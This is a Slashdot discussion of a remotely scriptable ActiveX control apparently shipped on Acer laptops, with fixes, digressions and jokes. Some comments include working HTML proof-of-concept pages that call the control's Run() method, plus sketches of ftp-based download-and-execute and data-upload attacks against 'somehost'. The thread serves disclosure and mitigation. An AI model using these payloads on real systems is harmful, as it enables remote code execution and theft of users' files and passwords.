Acer May Be Bugging Computers

tomjen writes "What if a well known laptop company had silently placed an ActiveX Control on their computers that allowed any webpage to execute any program? Well Acer apparently has and they have (based on the last modified-by date of the file) been doing this since 1998. 'Checking the interface of the control reveals it has a method named "Run()" as shown below. The method supports parameters "Drive", "FileName", and "CmdLine". Isn't it strange for a control that's marked "safe for scripting" to allow a method that is suggestive of possible abuse?'"

But dude...

[Thaidog]

They're Ferrari's

Re:But dude...

[Salvance]

Sucks to be one of the bloggers who accepted an Acer ... sounds like Microsoft wasn't being nice at all, maybe they're just increasing their spy network.

Re:But dude...

[MrNougat]

They're Ferrari's

They're Ferarri's what?

Re:

[MrNougat]

And then I spell Ferrari's (sic) wrong anyway. Someone shoot me.

And now that it's publicized...

[mallardtheduck]

I expect exploits for this to start appearing within days, if not hours...

Re:

[aauu]

Isn't there a $50,000 bounty on vista capable exploits? slashdot announces ..... Profit $$$$

Re:

[sidb]

You seem to have omitted step 2. Could you please clarify what it was?

Re:And now that it's publicized...

[Joebert]

Exactly, they're made by the Tooth Fairy & the Easter Bunny with the help of Santas' elves during their offseasons.

Re:

[plover]

Well, I just googled for the class ID, but didn't find anything other than links to this vulnerability warning. But I don't know of google will index attributes inside of <object> tags.

Re:And now that it's publicized...

[Ninwa]

The class-id was in the article :-) D9998BD0-7957-11D2-8FED-00606730D3AA

Opps! Nothing like bad publicity..

[msimm]

To keep corporations playing on the (more or less) straight and narrow.

Uhh, there already IS an exploit...

[nweaver]

Read the article: Theres a trivial piece of example "exploit" code running calc.exe.

But as you can run ANY windows binary with any command line (at least according to the article), actual exploitation is trivial.

present on Aspire 1690

[Phil246]

Checked mine, its present :( Anyone know if its safe to make that file and its registry entry 'disappear' ?

Safe

[twitter]

Checked mine, its present :( Anyone know if its safe to make that file and its registry entry 'disappear' ?

Sure, just go get the Mepis Patch [mepis.org]. This will end all of your activeX problems. It won't end your Flash, Adobe and other problems but those are minor in comparison.

Really, do you think eliminating this one control will make your computer safe? Chances are there are coppies that will "respawn" later, a common malware trick, and that there are far nastier controls you don't know about. The malic

Re:

[Phil246]

No, but it will make it safer (if only a little) then leaving it there.
Ive set its kill bit in the mean time though

Re:

[codepunk]

Well considering they are the creators of the almighty active x control that allows unsafe code execution in a browser, I would say yes he is suggesting that.

And he would be absolutely correct, well acer is not exactly off the hook here either.

@mozilla.org/process/util;1

[MushMouth]

Any mozilla extension (chrome) on mozilla/thunderbird/seamonkey/firefox/camino has access to this component which can run anything the user can.

Re:@mozilla.org/process/util;1

[h2g2bob]

Exactly, that's for extensions (and the browser itself) and is protected from execution by web pages. Exploits to either firefox or it's extensions or themes can lead to pwnage (same as any internet-capable program).

The difference between ie activex and fx extensions is that firefox encourages you to go through addons.mozilla.org, for which all the extensions are reviewed (though I don't know how thoroughly) and update automatically (eg if exploits are found).

Re:present on Aspire 1690

[valeurnutritive]

To remove this from your machine.

Goto Start > Run and type:
regsvr32 -u lunchapp.ocx

(-u for uninstall)

Re:

[Phil246]

thankyou :)

Re:present on Aspire 1690

[Staale Nordlie]

Why not just create a website that will use this vulnerability to run this "unregister" command on our machines and eliminate the vulnerability?

I copied the command posted by valeurnutritive into the html demonstration code from the article. Worked just fine as far as I can tell. It has a certain poetry to it. :)

<html>
<body>
<object classid="clsid:D9998BD0-7957-11D2-8FED-00606730D3A A" id="hahaha">
</object>
<script>
hahaha.Run("c", "\\windows\\system32\\regsvr32.exe -u lunchapp.ocx", "");
</script>
</html>
</body>

Re:present on Aspire 1690

[Odin_Tiger]

I was under the impression that only the exe went in the second param, and flags went in the final. Shouldn't it be
hahaha.Run("c", "\\windows\\system32\\regsvr32.exe", "-u lunchapp.ocx")
?

Re:

[Staale Nordlie]

You're right. It doesn't seem to matter though, as (like I said) it worked fine the way I did it. I got a confirmation message and my Acer laptop no longer runs calc.exe with the code from the article.

The 4th USB port

[wikinerd]

I once bought a Fujitsu-Siemens laptop with 3 USB ports, but when I opened it I noticed it had a non-visible 4th USB port near the hard disk that you needed a screwdriver in order to access. No mention of it in Fujitsu-Siemen's manuals and other documentation that I got with the laptop, and no mention of it on their website. Although visually hidden, the port was visible via diagnostics software. I thought that this could be one way to put a spy antenna or other device on a laptop (a USB port provides 500mA of power which is enough to power a large range of antennas and electronics). It could be used to put an anti-theft antenna revealing the laptop's location, to put a keylogger, or to put a backup device. In the end I just put a permanent flash key drive in it so I had a laptop with permanent flash storage in addition to the hard disk.

Re:The 4th USB port

[mallardtheduck]

Could just be there for optional "built-in" bluetooth or Wifi. A USB module is probably cheaper than an Mini-PCI.
Plus, if they do no wireless, Wifi-only and Wifi+BT models, with a single Mini-PCI slot, they would need both Wifi and Wifi+BT cards, if they have a "hidden" USB port, they only need to stock Wifi mini-PCI cards and USB bluetooth adapters, the same adapters that are sold independently.

Re:

[glesga_kiss]

most probably the extra port was there for bluetoth support. however, i did not like the fact that as a customer I was not told about it.

That's an insane attitude. Do you have any idea how many other unused parts there are in any PC? Strip it down to the motherboard and you'll find blank places for additional ports. Sometimes these even have blankers on the case in laptops. I used to work as an engineer in a laptop factory and one of our models had the places for a 9V adapter (it had a mains adapter as st

Re:

[starwed]

When I bought a USB2 PCI card for my desktop, most models had a single internal USB port as well as all the external ones. I think this is pretty common, and nothing nefarious.

It's an appendix.

[Kadin2048]

I think a lot of computers have internal ports that were put in there as part of the original board design, but were never taken advantage of during configuration or subsequent system design.

In an old Mac of mine (G4 "Sawtooth"), there is an internal Firewire port right on the motherboard, even though there are virtually no (to my knowledge anyway) internal Firewire devices available. The most useful thing you can do with it is run it out to a dummy card-slot panel and give yourself an extra external port. (I suppose you could also run another HD by using a IDE to FW converter card, if you could find a small enough one.)

It's there, I suspect, because when they were designing that mobo, it wasn't clear that Firewire would be used primarily for DV and external peripherals, and wouldn't become the internal-peripheral interconnect of choice. For all the designers knew, Firewire could have become like SATA is today, with hard drives being built for it natively. In that case, having one inside the case could be useful as hell (particularly since that machine has space for 4 or 6 internal 3.5" HDs and 2 removable-media drives). They had no way of knowing that it would end up being the electronics version of an appendix.

I suspect if you were to look around closely at the first generations of a lot of technologies, you'd find a lot of things like this; design decisions made for possibilities that just didn't pan out, but were left there anyway.

Re:

[Zouden]

I suspect if you were to look around closely at the first generations of a lot of technologies, you'd find a lot of things like this; design decisions made for possibilities that just didn't pan out, but were left there anyway.

Like multiple camera angles on DVDs? There's even a 'camera' button taking up space on my remote.

Multiple Angles

[splutty]

This is getting to be way off topic, but seriously. It seems you don't know the primary reason of existence for DVDs, which is something that the multi angle button is used in quite a lot.

Of course I'm talking about the driving force behind almost all new electronical inventions, the Pr0N.

Re:

[Hoi Polloi]

I use it when watching my Simpsons DVDs. I like to see what the other camera angles caught during filming.

The extras where Homer works up the live studio audience before filming a show are great too.

PHB == appendix

[TapeCutter]

I know that some, but certainly not all, "hidden" hardware/software is the result of a PHB "work-around", I submit the following anecdote about illogical engineering vs optimal solutions....

Many moons ago I worked on a large project where we supplied a logistics application along with 8000 laptops that we were also expected to maintain. The spec's for the laptop's were written into the $80M/5yr contract, in particular the contract specified "special" (ie: manafactured by our sister company) laptops with a 120M HDD. A thousand or so laptops were delivered immediately, I suspect this was mainly to garner a large initial payment, 800 were then stored in a warehouse by the customer for 2yrs while we wrote the software and ran a pilot with the other 200.

When it came time to ramp up to full production we found we could no longer get 120M HDD's but could get 250M for the same price (the HDD's were third party PCMCIA cards that were supposed to be "pre-imaged" by the hardware guys). The Dilbert moment happened when a PHB with way too much time on his hands had to sign the purchase order and demanded 120M HDD's because "that's what's it says in the contract". The solution was illogical but effective, we quietly arranged for our hardware friends to format the 250M physical drive into a 120M logical drive and ignore the remaning space (and told them why). A few PHB readable edits to the PO and hey presto a warehouse full of laptops with our software pre-installed on 120M drives and an extra PHB-invisible partion.

Now throwing away half the drive is clearlly illogical but in my mind it was the "optimal" solution, with the possible exception of a time consuming appendectomy that would gum up the workflow for weeks/months and could possibly result in a devil we didn't know taking over. I also say "optimal" because: The PHB belived he had asserted his authority over the project and a rival PHB in the sister company, all with just one demand. From what I recall he went off to pester someone else and gloat about it. Not only did it nueter the PHB but HR, the lawyers and the accountants were kept in their cages, the techies got a good laugh, and the customer remained oblivious to the whole fiasco.

Finally, a year or so into production when the image size started to bloat towards the 120M limit, the same PHB asked for a costing to retrofit bigger drives, like any good salesman we umm'ed and ahh'ed then went off to "see what we could do" before announcing we could remotely activate a new D: drive on a standard update cycle using some simple "magic" and a couple of mandays labour. The news delighted the PHB who promptly added a manday for his own "time". We didn't even hint that it was his previous demand had caused the current space squeeze, we simply saved our eveidence in case an appendectomy was required at some future random impasse. We also saved all the "can do" brownie points for the next time we had to convince the same PHB that his proposed solution to some imaginary problem really, truly, is a "can't do" situation, regardless of what PC week says.

Re:

[Registered Coward v2]

When it came time to ramp up to full production we found we could no longer get 120M HDD's but could get 250M for the same price (the HDD's were third party PCMCIA cards that were supposed to be "pre-imaged" by the hardware guys). The Dilbert moment happened when a PHB with way too much time on his hands had to sign the purchase order and demanded 120M HDD's because "that's what's it says in the contract". The solution was illogical but effective, we quietly arranged for our hardware friends to format the 2

Isn't it a little bit naive

[zappepcs]

to think that Acer and others have not been doing this for years? Put on the tin foil hat now, they may be doing so in conjunction with governments. Lets not stop there, your ISP and phone company might also be doing the same thing?

I bet that buried in the EULA somewhere is a statement about remote support or some other such thing that would negate any complaints about this code as far as culpability goes. Wonder what they will do now that the botnet boys know its there? Just one more reason that people who want to have a safe computer should learn how to administer one properly... IMO.

Re:

[Telvin_3d]

While I agree with you in general paranoid principle, I think the last bit is a little naive. It's like saying that if you want to have a safe house, you should be able to build your own in order to make sure there is no secret explode-on-remote-command hardware installed. Yes, people need to pay a little attention, but this type of shit is above and beyond anything that should be expected.

P.S. I want to see Holmes on Homes run across a secret explode-on-remote-command thing in an episode. That would mak

Re:

[zappepcs]

I was thinking that 'meh, Telvin is probably right' but I thought about it again. Not to take an opportunity to diss you or anyone, but rather to explain my point a bit better.

Anyone, almost, can get a license to drive a car. The few that will put power steering fluid in their oil because they know nothing about cars will learn a very expensive lesson. There are many examples here where just a grounding of common sense would save people from very costly and perhaps embarrassing episodes. There are awards ev

Lessons learned...

[Anonymous Coward]

1) Whenever possible, build your own.

2) When you can't build your own (laptops), *always* re-install your OS after purchasing a new computer, and for God's sake use a real install CD and not the recovery one provided by the manufacturer.

Re:

[GaryPatterson]

Excellent suggestion!

So, for the other 99% of users (you know, the ones who just want a computer that does what it's advertised to do), what's the solution?

Re:

[mrchaotica]

Buy a Mac.

(Seriously.)

cvrsd;lk.a5df.a,pfll;

[Tablizer]

Can't...get...back...contr...Everything is Fine and Happy. Nothing to Worry About. Have a Nice Day!
     

LunchApp.ocx

[snicho99]

Don't panic. It's not a method for launching applications.

The original article failed to notice that it's a Lunch application. It's actually a throw back to when Acer briefly partnered up with 180solutions to deliver targeted pop-under sandwiches to hungry laptop owners. The idea being that after seventeen hours of trying to uninstall Bonsai Buddy the computer user would be debilitated through starvation and susceptible receptive to sp(iced h)am..

The program was abandoned when Acer's engineers failed to perfect the wasabi-over-ip protocol - leaving the whole system unreliable an prone to bagel overrun.

Re:

[OldManAndTheC++]

engineers failed to perfect the wasabi-over-ip protocol

Wasn't that the forerunner of Hamachi [hamachi.cc]?

SWAH!?!

[foo fighter]

This news is unbelievable.

Acer still makes computers? People still buy them?

I remember Acer being a budget brand with a bad rep for quality and customer service back in the mid- to late-90s. I can't believe they are still a going concern.
 

Re:

[pchan-]

Acer is the number 4 maker of personal (ie, non-server) computers in the world, behind HP, Dell, and Lenovo and ahead of Apple. At least that's what the statistics say, I've yet to see anyone using an Acer.

Re:

[BrainInAJar]

I've yet to see anyone using an Acer.

Look harder?
Every other laptop I see these days is an Acer. Hell, I'm on an Acer right now (the Aspire series run Solaris fantastically).
Quality's not bad on them these days and they're about half the price of the exact same laptop rebranded (Toshiba made a line of laptops that had the same hardware including case as the Aspire's, I imagine they were just rebrands)

Re:SWAH!?!

[p0tat03]

Depends on what you mean by that. I'm prepared to believe that Acer, or some of its subsidiaries, handles a significant amount of manufacturing for otherwise famous (and respected) OEM brands. That said, Acers are junk, some of those brands are not.

Having worked in manufacturing, I can say with confidence that it's *usually true* that the manufacturer can just about build anything to any quality level you desire, the only force stopping you is the almighty dollar. I worked in an auto parts plant, and we made the crappiest of parts that would die on you after a couple years to the most premium of car parts that would go on working for decades... It all depends on how much the customer is paying.

I suspect Acer, Asus, Foxconn, and any other manufacturing contractors are exactly like this. While Acer's own branded laptops are invariably crap (waaaaay too many bad experiences, ugh), I would not be surprised in the least if quality laptops are made under the same roof, for other people.

contract manufacturing of computers

[smellsofbikes]

I worked at a place that actually built servers and desktops for Dell and HP, among others. You're correct: we built to a required price point. HP servers were 100% functionality tested, multiple times, in hot/cold chambers. HP desktops were 100% functionality tested. Dell desktops were power-on tested. We built motherboards for someone, I don't know whom, that weren't even power-on tested, just shorts-tested on automated test equipment.

Re:

[nikster]

Very true. Acer's top of the line laptops are pretty good, while the cheap low end systems are c-r-a-p. I had both: I had a high-end Acer which was flawless (TM803), went to a budget Acer (TM4600) which basically didn't work and I had to get rid of after overheating, two fried HDs and one fried mainboard, and now a TM8204 which works just fine.

The Acer Service Center which I was a frequent visitor at with the 4600 offers extended warranties. The extended warranty for the "business line" is half the price of

Late again!

[whoever57]

Apparently, someone in Brazil noticed this last November [extremepc.com.br]

Easy fix for this problem

[Shadyman]

1. Format your hard disk 2. Install Linux 3. Return your Windows for a refund (Profit!)

"Pre-hosed" -- always wipe it

[mlts]

On all new computers, be PCs, Suns, RS/6000s, or anything, after getting the machine out of the box and plugged in, I tar (or ghost in the case of PC recovery partitions) off anything preinstalled to two backups, then format the hard disk (or disks/arrays) on the machine. After the disks are formatted, I then install the OS and drivers and get the machine to the latest patches that I can via CDs. Only after this and a lockdown check does the machine see the network.

I've just seen too many machines come pre-hosed from the factory. For anything that sees production use, I want to pack my own parachute and know exactly what is on the machine.

On PCs, I try to find drivers from the underlying OEM rather than depend on the PC vendor, as usually the PC vendor's drivers tend to be outdated, except for motherboard/system board/IO planar flash.

Who Wudda Thought

[BoRegardless]

Anyone would be that utterly deceptive...I mean...certainly not a manufacturer of hardware...or certainly not a major software developer...uh...oh, I forgot, except for those accidental bugs in the OS software...and indeed the unfortunate BBBBrowser.

IE7 stops the attack

[suv4x4]

Notice that in the article if you have IE7 it'll stop the attack since the user will be notified the page executes an unknown ActiveX and ask for permission (in the yellow creeping bar) before doing anything.

Of course IE7 is only at 20% vs IE6 at more than 60%, but still, shows the browser going in the right direction.

Re:

[suv4x4]

The right direction would be running screaming away from active X entirely.

The hatred towards ActiveX is largely unfound. What would happen to sites like YouTube or movie sites, video, audio sites, if all browsers are suddenly rendered incapable of supporting plugins.

The mistake of Microsoft was that ActiveX were way too easy to install, and this is corrected in a major way in IE7.
In fact, the plugin API and extensions of Firefox can do just as much damage and much easier (since people trust those) than Act

Re:I'm not impressed with this IE7 "improvement"

[suv4x4]

You may be shocked to realize that Firefox plugins and extensions don't run in any sandbox at all. They in fact have access to any resource Firefox has, which on a Windows machine is usually administrator capabilities.

So what was the beef with ActiveX again?

Oh, and in Vista, IE7 runs in limited mode even on admin accounts, so ActiveX controls are limited too. Firefox so far doesn't take advantage of this.

It's easy to open wide a big mouth and flame Microsoft, but the thing is: how is the competition better?

I won't be surprised if all it's better about (in terms of security) is that it's less popular and thus less targeted by malware authors. We've seen some of this during the Firefox adoption boom, but I'm afraid IE7 might kill the further adoption of Firefox so I can prove it.

Re:I'm not impressed with this IE7 "improvement"

[FireFury03]

You may be shocked to realize that Firefox plugins and extensions don't run in any sandbox at all. They in fact have access to any resource Firefox has, which on a Windows machine is usually administrator capabilities.

You don't need to sandbox the plugin itself - you need to sandbox any code the plugin downloads and executes. For example, a Java VM plugin is not in a sandbox, however *it* sandboxes the bytecode itself - the VM restricts what the code can do. On the other hand, ActiveX failed to do this since it provided functions to access every aspect of the host environment.

So this isn't anything to do with insecurities in the browser, this is down to insecurities in the plugin. Any firefox plugin that allows anything downloaded from the web to execute arbitrary commands on the host would be considered similarly insecure.

On behalf of Acer

[Qbertino]

Acer is one of the 'big name' Laptop producers that actually sell Laptops with Linux preinstalled that are generally available and visible [alternate.de] and don't require placement of a special order at headquarters overseas. And they let you notice the price difference to the same models with Windows on them.
Solution to this 'bug': If you buy an Acer, by one that comes with Linux.

Re:On behalf of Acer

[sunwukong]

But do you know they haven't placed a rootkit on the preinstalled Linux?

pre-owned?

[BigBuckHunter]

Kinda changes the definition of a "pre-owned" machine!

BBH

Test/exploit code

[Koyaanisqatsi]

The code to test for the vulnerability, right from the Brazilian article about it linked on another post. Save it as an html file and browse it with IE.

<html>
<body>
<object classid="clsid:D9998BD0-7957-11D2-8FED-00606730D3A A" id="hahaha">
</object>
<script>
hahaha.Run("c", "\\windows\\system32\\calc.exe", "");
</script>
</html>
</body>

Question: is this another Acer backdoor?

[GreatBunzinni]

When I read this message what popped right on my mind was the existence of an administrator account which camed pre-installed on my Acer laptop. The account is called "ASP.NET Machine A..." which is protected by a password and I'm not able to uninstall it no matter what I try. Can this be another Acer backdoor installed on their systems?

P.S.: the article's backdoor was also present on my system. those bastards...

Re:

[Beardo the Bearded]

No.

That's just what happens when you install the .NET framework. Apparently you have to run as an administrator to use some of the .NET controls. Solution: Make a .NET account with administrator privileges.

Pretty cool, huh?

Re:Phew!

[BrainInAJar]

Mine shipped with Linux, which I immediately wiped & installed FreeBSD, but I appreciate the thought

Re:Phew!

[gardyloo]

Haha. I was just joking. I actually use mine by drilling through the case, and making and breaking a couple of connections between the motherboard and three "C" cells hooked in series with paperclips. Manually, beeyotch. Real men type in raw binary without the keyboard. But I appreciate the thought.

Re:Phew!

[Stormwatch]

Someone please mod this agressive idiot to hell....please.

There is no "-1 sinful" moderation, sorry.

Re:Phew!

[Dilaudid]

Old? Hah I rememember trolling by morse code back when slashdot was a ham radio channel.

Re:Phew!

[pallmall1]

And liked it!

Re:Phew!

[anticypher]

I rememember trolling by morse code back when slashdot was a ham radio channel.

Youngsters these days. Back then it was called dashdot, it predated even radio, the oldest of us trolled with semaphores. With the introduction of electrickity, the whole telegraph scene took off. Then some guy named Morse forked the project and publicised the code as his own. It's been downhill ever since.

Hitches up his braces, fires some chaw in the spittoon, waits for someone older to out-troll

the AC

Re:

[AJWM]

Why do we call "pig" ham and "cow" beef?

It dates back to the Norman invasion (no, not Spiney, but 1066). The (primarily Norman French) aristocracy called food by the french words -- boeuf, jambon (hence ham), etc. The stuff the peasants ate, or that nobody ate (eg horse), wasn't.

BTW, the word "poultry" is similar to the french word for chicken -- poulet.

Re:

[Kadin2048]

Just out of curiosity, where did you get it pre-installed with Linux? And would you recommend wherever you bought it from?

I'm still hoping that Lenovo will see the light and sell ThinkPads (or whatever they're calling them these days) without Windows; I never could get a bare one from IBM, and there was always just something galling about buying software that I don't want to use.

Re:Phew!

[BrainInAJar]

There was a local computer store in town that was selling them, and apparantly Acer shipped them to the store with Linux preinstalled. Some strange Chinese distro I'd never heard of... I'd reccomend the laptop, yeah... Served me well so far... warranty just expired and I've had no need to use it.

and no, I wasn't going for humour mods... my laptop actually shipped with Linux, and I did wipe it for FreeBSD (it runs OpenSolaris now, but that's beyond the point).

Re:Phew!

[belmolis]

I recently bought a laptop with Ubuntu pre-installed from The Linux Store [thelinuxstore.ca], which is in Ontario. I've been perfectly satisfied aside from the minor point that they only offer the choice of Ubuntu and Fedora Core when I would have preferred Debian.

Re:Phew!

[DaveCar]

Heh, if you're the kind of anal-retentive who runs Debian then you'd probably have an problem with which version of Debian they installed. Then the kernel version, then the desktop environment ... if you want to run Debian it is probably easier on everyone if you just install it yourself ...

I run Debian ;-)

Re:Phew!

[Linker3000]

Meh,

I immediately reformatted my newly-purchased Acer's hard disk, installed DR-DOS and Crosstalk and do all my computing on a VAX 11/750.

Next...

(My Acer - Windows) + Windows + Linux = Good

[5of0]

Note: The following comments are legitimate information, designed to help people help themselves. I am not an Acer fanboy (I reserve that for SanDisk), but I like my laptop. YMMV.
Actually, I have an Acer Aspire 1640. It's a nice machine for the $799 I got it for about 6 months ago. And Acer doesn't load a bunch of AOL/WildTangent/EarthLink/etc useless "applications" that are bundled because they can't stand on their own, like certain other manufacturers *cough*Dell*cough*HP*cough*. The few things that were bundled (counted on *maybe* 2 hands) were actually useful.
Once I got to college (where I have access to $10 Win XP Pro discs) I wiped it, reinstalled Windows (gasp!) *and* Ubuntu Linux. Works great, and with 120GB HD, plenty of space for both OS's. The Windows works great, since it's very light (only Windows-only stuff, everything else is on Ubuntu+Wine).
Hardware support on Linux is pretty decent. After some elbow grease, wireless, ethernet, widescreen, CPU power stepping, Sansa m250, even hardware buttons are working. Sound is the only thing I'm not sure about, output works fine, input seems finicky. I could probably fix it, but I don't care that much yet.

So...I'm not that concerned. Besides, who uses Internet Explorer anyway?
(That was sarcasm. I know the correct answer is "98% of everyone, luser!")
(That was sarcasm too. I know the correct answer is really "No, it's 89%, n00b!!11!!BBQ!! Look at my fancy link [example.com]!!")
(Other appropriate comments include "I for one welcome our new Acer-invited overlords", "In soviet russia, computers bug Acer!", "I use lynx, you insensitive clod", "Ubuntu sux. [Insert Distro Name Here] is sooo, like, better because [insert unsubtantiated claim here].", etc., ad infinitum.)

Re:

[GFLPraxis]

It's a good thing...Other companies like HP and Sony no longer include restore disks, so when a Windows user gets a virus that messes some system files up, they have to pay ridiculous amounts to order restore disks if they didn't remember to do it themselves.

Re:Phew!

[mallardtheduck]

My HP notebook, bought about 15 months ago not only came with restore disks, but a plain Windows XP SP2 disk and disks for WinDVD and Sonic's CD recording software.

I don't know about SONY, but in my experience, HP are more generous than most in terms if disks included with their PCs.

Re:

[Zardoz44]

I concur. I'm on my HP laptop right now, which is about 20 months old. It came with only one partition, so I had to format the entire thing when I got it to repartition it--I know I could have probably used something like Partition Magic, but I'm cheap and I wanted to uninstall all the cruft, like the Sonic garbage.

The upside is that it did some with a clean* (*HP OEM) Windows XP disk. Even though it was OEM, it gave me the option to keep most of the useless HP software off.

Beyond than, no problems y

Re:

[Tauvix]

I work for a major retail chain that sells HP/Compaq notebooks and desktops. HP/Compaq desktops have required you to create the recovery discs for at least 3 years now, however it was not until the August/September 2005 model refresh that they stopped shipping recovery discs with their notebooks.

Re:Phew!

[phalse phace]

Don't know about you, but I wouldn't call $20 a ridiculous amount to pay for a set of restore disks. And you can avoid paying the $20 or so by burning your own set of restore disks... my HP notebook prompted me to do so when I first turned it on. It just burns an image of the restore partition on the C: drive. If you forget or decide you want to do it later, it will/can remind you again in a couple days or so.

Re:Phew!

[Propaganda13]

Corrupt that extra partition and see how far that "restore" disk gets you. It's not the regular Windows restore disk that used to come with computers and it's definitely not a Windows disk. It won't work without the data on the partition.

$20 for the set of disks + $52.50(Dell refunded price for Windows) is about the same price you could buy Windows XP Home OEM version for.

Re:

[Splab]

My HP laptop came with a nice DVD including the windows installation and all the basic drivers to get the baby going. I think it depends on how cheap you buy your machine (Mine is a Nx8220, not top of the line, but it sure isn't cheap).

That's BS

[cheros]

Sony and HP don't include restore disks because they're harder to keep current than a production disk image - they're DVDs, not CDs.

All you need to do is burn the images (DVDs) when you get the laptop, and Sony positively nags you repeatedly to do it. Also, if you leave the recovery partition in place you can do it again later.

As for getting the original DVDs, they don't charge a ridiculous amount (in the $60 region) but they do ask for a ridiculous amount of proof that it's your own laptop and you're not going to share the disks with the world..

Don't know about HP, but have handled enough Sony laptops :-)

Re:Phew!

[pboulang]

I spend a hundred bucks on dinner sometimes, and that's just for me, not including the babe or the vino. Sheesh.

Do you have to pay for the babe by the hour or is it a flat rate?

Chef said it best

[spun]

Chef: You see, chidren, sometimes a man needs to be with a woman.
But sometimes, when the lovin' is over, the woman just wants to talk and talk
and talk and talk.

[song]
But a prostitute is someone who would love you
No matter who you are, or what you look like.
Yes, it's true, children.
That's not why you pay a prostitute,
No, you don't pay her to stay, you pay her to leave afterwards.
That's why I pays a lot for prostitutes! Ladies and Gentlemen, Mr. James Taylor.

James Taylor: A prostitute is like any other woman
T

Re:

[east coast]

you're missing the point. what happens on the day that they start putting out linux and simply "make things easier for the end user" by circumventing some common sense security measures?

Re:

[ForestGrump]

Well, still 8 years newer than the file in question.

Wider scope

[msobkow]

Intel had to allow people to disable CPU ids.

Why is Microsoft allowed to "embed" an id string like the WGA identifiers that allow them to identify and traceback any individual who does an update of LEGALLY LICENSED SOFTWARE?!?!?

Why do I see a 3 year backlog of error/debug messages in certain WinXP system log files, and receive advice on how to disable error logging instead of someone FIXING THE PROBLEM?

Re:to those of us uneducated

[Anonymous Coward]

Please give examples or something of how this could be used for ill purposes. Yes, I realize it is obvious to most people but I'm a beginner. I do not know what harm can come of the power, in and of itself, of being able to run a program that is already on computer. Would one, through this particular acer thing, be able to pass things to that program and then have that program in turn do other bad things or what? Please give rudimentary examples.

One could, for example, use the Windows ftp.exe client to download an arbitrary program (e.g. botnet software) and then execute it. I'm certain there are even better ways to do it but this one could work well enough to completely take over the machine.

Re:

[Lehk228]

could also use the windows FTP command to upload data from the hard drive such as cookies or excel spreadsheets etc.

Re:to those of us uneducated

[codepunk]

I have not seen the control or have a copy of it but it can be a simple as a couple of lines
of script in a web page. Now I can possibly own most acer laptops visiting that page.

The script could do something like this
ftp somehost
ftp get somefile
execute somefile

Bingo I own your laptop.

Or say I just ftp your firefox data so I can grab your history, passwords etc.

Re:

[2ms]

Windows has in-built ftp? This script is able to pass that much info (like url and sequence of app launching/operation commands)?

Re:

[codepunk]

You bet open up a command window and type ftp you will notice that it has a built in ftp client. Simply calling the run method on this control in a script and you can run anything you want, download or upload anything you want just by the client browsing a web page.

Re:to those of us uneducated

[this great guy]

It is possible to use ftp.exe in such a way. I work in the ITsec field and have used this exploitation technique in the past (step 1: create foo.txt containing ftp commands to download malicious.exe, step 2: run ftp.exe @foo.txt, step 3: run malicious.exe).

I really have a hard time understanding your mindset. You refuse to believe in the seriousness of the vuln even when people give you an attack vector example. Please, why ?

Re:

[man_ls]

Or, you could use Run() to generate the script for the FTP client in place on the target's hard drive.

Run(drive,path,"type \"FTP COMMAND LIST HERE\" > script.txt");

or any other method of entering arbitrary command-line data into a file.

Then, run as normal.

Re:to those of us uneducated

[djupedal]

"Please give examples or something of how this could be used for ill purposes. Yes, I realize it is obvious to most people but I'm a beginner."

A beginner & an AC - wants to know exactly how to execute the 'bad thing', and promises not to inhale :)

Oh...rudimentary...well, that's different. Since Acer would presumably have the power to control any aspect of your computer when you use it to log onto any webpage, all they need to do is to wait for you to access a site under their control, and bingo, they can lift all of your installation logs, cookies, saved passwords, MS WORD docs containing the words 'budget; personal; finance; medical; records; debt; sex, SSN (and all applicable variants),etc.

OK, let's say you are gullible enough to think that they can take all of that they want, and still not put you at risk - now, think for just a moment about who 'they' are...? What are the odds of 'they' going to all that trouble and not having some plan to do something with what they glean that you will not be pleased with...? Still not impressed?

How's this... Acer sits around and waits for just the right time and boom - they toggle a flag on your computer that makes it appear that it needs to have XYZ repaired, and what do you know, the only resource is...ACER!!

A new age variation on the old water-bag trick. One guy owned two service stations. One station was the last stop before heading out of LA, into the desert, heading for Palm Springs. The other was the last service station before heading out of Palm Springs, out across the desert, heading for LA. When a car stops on the LA side, the station staff sell the unaware traveler a scary story about being in the desert and having the car break down from overheating. Seems, tho, if you buy a canvas water-bag filled with water, and hang it on your car's front grille, it will supposedly help cool the air before it flows across the radiator. Best insurance money can buy. Thank ya now, ya'll have a safe trip! :)

Problem is, that big 'ol canvas bag actually blocks the airflow, and by the time you get near the other side of the desert, your car overheats and you have to pay the Palm Springs service station to come and tow your car and fix everything that broke from overheating. Not a small fee, even in those days. They explain how the bag is what did the damage, and the hapless owner tells them to keep it.

What do you think the Palm Springs service station guys do with the demon water-bag? Well, of course, they sell it to the next dupe going from there to LA, and even help by attaching it to the grille of his car. Thank ya now, ya'll have a safe trip! :)

I figure that one bag most likely made dozens of round trips across the Mohave, and put at least two generations of kids thru law school :)

Rumor has it owning those two stations was the fastest way to retirement until the big casinos came in and the real pocket-picking took off.

Re:

[PAjamian]

Since Acer would presumably have the power to control any aspect of your computer when you use it to log onto any webpage, all they need to do is to wait for you to access a site under their control, and bingo, they can lift all of your installation logs, cookies, saved passwords, MS WORD docs containing the words 'budget; personal; finance; medical; records; debt; sex, SSN (and all applicable variants),etc.

OK, let's say you are gullible enough to think that they can take all of that they want, and still not put you at risk - now, think for just a moment about who 'they' are...? What are the odds of 'they' going to all that trouble and not having some plan to do something with what they glean that you will not be pleased with...? Still not impressed?

How's this... Acer sits around and waits for just the right time and boom - they toggle a flag on your computer that makes it appear that it needs to have XYZ repaired, and what do you know, the only resource is...ACER!!

I doubt their intentions are anything so malicious. TFA states that this control is from back in 1998. Back then internet security wasn't as big of a concern as it is now. They probably put the control in place with the intention that they could use it to launch a help-desk application or run commands for repairing the computer remotely (ie from a help desk tech). Maybe have knowledge base articles that link to pages that automatically run the repairs needed. The active-x control can certainly do all

Re:

[djupedal]

"You're in trouble the first time you try selling the water bag to someone whose car you repaired a few weeks previously."

Well, duh :)

A good con man always remembers the mark... Not stepping in it is all part of the dodge [filmogs.com]. Most times, during those days, it was one way, and the odds of seeing the same mark were pretty low. Families and individuals going to California [lyricsfreak.com] to make a new start for their future, right after the war, were all part of an influx that would last for decades.

U-Haul celebrated 60 [uhaul.com]

Re:

[plover]

Click Start/Run, then in the box type this:

del c:\windows\system\lunchapp.ocx

That will delete the object itself.

Re:

[Lehk228]

run regsvr32 -u lunchapp.ocx from start>run it will unload it without having to edit the registry